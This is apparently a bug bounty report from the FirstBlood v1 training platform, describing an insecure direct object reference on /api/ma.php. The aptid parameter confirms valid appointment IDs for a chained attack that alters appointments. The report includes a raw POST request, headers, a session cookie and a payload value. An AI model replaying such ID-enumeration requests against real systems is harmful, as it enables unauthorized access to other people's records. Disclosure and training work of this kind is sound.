FirstBlood-#129IDOR 2 on ma.php - confirms numerical id for bug chain to report 127 without the need for drpanel
This issue was discovered on FirstBlood v1

On 2021-05-10, jpdev Level 3 reported:


Using the aptid paramater found on manageappointment.php, you can use this in place of the id parameter this will ONLY confirm that the numerical id is valid and returns a success message. It does not cancel the appointment. If you do not have access to the drpanel you can you use this bug in a bug chain to amend the messages on the appointment see report 127.

Example of its use in a chain:

Use the below to confirm the id is valid, with the id perform the attack referenced in report id = 127


POST /api/ma.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-SITE-REQ: permitted
csrf: 99215d4e-0ff3-4275
Content-Length: 25
DNT: 1
Connection: close
Cookie: drps=62f02a3467fff377e02116e10


P2 High

Endpoint: POST /api/ma.php

Parameter: aptid=

Payload: 56911904

FirstBlood ID: 6
Vulnerability Type: Insecure direct object reference

The endpoint MA.php (to modify an appointment) will allow for integer values to be used when modifying appointments. A bad cause of security through obscurity was attempted.